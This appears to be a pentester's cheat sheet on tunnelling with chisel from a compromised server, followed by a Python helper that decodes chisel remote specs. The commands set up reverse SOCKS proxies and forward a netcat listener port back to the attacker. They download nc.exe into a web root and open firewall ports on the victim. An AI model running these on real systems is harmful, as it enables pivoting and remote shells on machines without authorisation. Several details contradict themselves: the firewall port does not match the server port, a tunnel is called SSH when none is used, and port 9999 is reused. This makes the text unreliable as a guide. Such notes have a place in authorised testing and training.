Chisel

Chisel works in a client-server way, so the chisel binary needs to be on both the attacking machine and the compromised server.

Reverse Shell over SSH tunnel

Set up SSH tunnel and chisel server on your machine

chisel server -p 1335 --reverse &

Set up the chisel client on the compromised webserver (Linux shell, PowerShell and cmd variants):

./chisel client 10.10.14.10:1335 R:9999:socks &
Start-Job {.\chisel.exe client 192.168.45.237:1335 R:9999:socks}
Start /B chisel.exe client 192.168.45.233:8080 R:9999:socks &
  • Connecting to the chisel server (10.10.14.10) on port 1335

  • R:9999:socks opens port 9999 on the chisel server (the attacking machine) as a SOCKS proxy; anything sent into that port is tunnelled out through the compromised host

Set up a python web server on port 9999 and download the reverse shell (nc.exe) from the other machine:

curl http://172.16.1.100:9999/nc.exe -o C:\xampp\htdocs\nc.exe

Repeat the port forward, but for the nc listening port, so that a connection to 127.0.0.1:1337 on the compromised host reaches the nc listener on port 1337 on the attacking machine:

./chisel client 10.10.14.10:1335 1337:127.0.0.1:1337 &

Reverse SOCKS Proxy

First we need to set up the chisel server on our attacking machine

chisel server -p 1335 --reverse &

Next, set up the client on the compromised server:

./chisel client 10.50.102.164:1335 R:socks &
  • R:socks

    • R marks a reverse remote (chisel calls each forward a "remote"): the listener is opened on the server side rather than on the client. This tells chisel that the server is waiting for a proxy or port forward to be made by the client

The chisel connection itself is made on port 1335, but the SOCKS proxy is opened on the attacking machine at 127.0.0.1:1080 (chisel's default for a socks remote). So we will be using 1080 to send traffic through the proxy.

Local Port Forward

A remote port forward is when we connect back from a compromised target to create the forward (the sections above). Here it is the other way round: the chisel server runs on the compromised host and we connect to it from the attacking machine with a local forward.

Start the chisel server on the compromised host (you will also have to open the firewall port the server listens on; the port in the firewall rule must match the --port given to chisel server):

./chisel_windows.exe server --port 54321 --reverse --socks5
netsh advfirewall firewall add rule name="Chisel-Adot8" dir=in action=allow protocol=tcp localport=15997

OR

firewall-cmd --zone=public --add-port 15997/tcp

Connect to the chisel server from the attacking machine:

chisel client 192.168.194.95:54321 127.0.0.1:9999:127.0.0.1:3306

Everything we send to 127.0.0.1:9999 on our machine is forwarded through the tunnel to 127.0.0.1:3306 on the target.
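To read a chisel remote spec the way chisel does (which side opens the listener, on what host and port, and where the traffic comes out), here is an added Python helper that is not part of chisel or of these notes; it mirrors the defaulting rules in chisel's README for the TCP forms used above (R:9999:socks, R:socks, 1337:127.0.0.1:1337 and 127.0.0.1:9999:127.0.0.1:3306), which is also handy for reading a chisel command line picked up in process telemetry.

```python
"""Decode a chisel remote spec into who listens where (added example, not chisel's code).
Mirrors the defaulting rules in chisel's README, TCP remotes only: fields are read
right to left, 'socks' may replace remote host:port, local host defaults to 0.0.0.0
(127.0.0.1 for socks), local port defaults to the remote port, and a leading 'R:'
reverses the forward so the listener opens on the server instead of the client."""
from dataclasses import dataclass


@dataclass
class Remote:
    reverse: bool = False
    socks: bool = False
    local_host: str = ""
    local_port: str = ""
    remote_host: str = ""
    remote_port: str = ""


def is_port(p: str) -> bool:
    return p.isdigit() and 0 < int(p) < 65536


def decode_remote(spec: str) -> Remote:
    r = Remote(reverse=spec.startswith("R:"))
    parts = (spec[2:] if r.reverse else spec).split(":")
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"invalid remote: {spec}")
    for i in range(len(parts) - 1, -1, -1):  # remote side first, then local side
        p = parts[i]
        if i == len(parts) - 1 and p == "socks":
            r.socks = True
        elif is_port(p):
            if not r.socks and not r.remote_port:
                r.remote_port = p
            r.local_port = p  # a port further left overrides the default
        elif not r.socks and not r.remote_host:
            r.remote_host = p
        else:
            r.local_host = p
    if r.socks:
        r.local_host, r.local_port = r.local_host or "127.0.0.1", r.local_port or "1080"
    else:
        r.local_host, r.remote_host = r.local_host or "0.0.0.0", r.remote_host or "0.0.0.0"
        if not r.remote_port:
            raise ValueError(f"missing port: {spec}")
    return r


def describe(spec: str) -> str:
    r = decode_remote(spec)
    listens, exits = ("server", "client") if r.reverse else ("client", "server")
    target = "a SOCKS proxy" if r.socks else f"{r.remote_host}:{r.remote_port}"
    return f"{listens} listens on {r.local_host}:{r.local_port}, traffic exits the {exits} to {target}"
```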
